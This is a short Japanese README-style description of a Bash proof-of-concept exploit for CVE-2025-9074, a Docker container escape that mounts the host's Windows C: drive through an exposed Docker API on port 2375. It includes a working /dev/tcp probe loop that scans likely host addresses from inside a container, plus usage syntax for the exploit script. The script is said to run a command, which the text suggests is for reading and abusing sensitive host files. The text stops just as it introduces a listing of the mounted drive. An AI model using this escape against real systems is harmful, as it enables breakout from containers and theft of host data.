
Bashベースの概念実証エクスプロイトCVE-2025-9074。脆弱なAPIエンドポイントを介してホストのWindows C:ドライブをマウントすることにより、Dockerコンテナからの脱出を可能にします。
コンテナ内部から、以下を使用して脆弱なDocker APIを見つけます:
for ip in 172.18.0.1 172.17.0.1 192.168.65.7; do
(echo > /dev/tcp/$ip/2375 2>/dev/null && echo "[+] $ip:2375 open") || :
done
このbashスクリプトを次のように使用します:
$ ./cve-2025-9074-poc.sh <IP> <PORT> <CMD>
このスクリプトは、新しいDockerイメージを作成し、ホストのWindows Cドライブを /host_root/ ディレクトリにマウントし、イメージを起動し、その後コマンドを実行します(このコマンドはおそらく、ホストから機密ファイルを読み取って悪用するために必要なものです)。
以下は、マウントされた '/host_root/' ディレクトリのリスト表示を示しています:
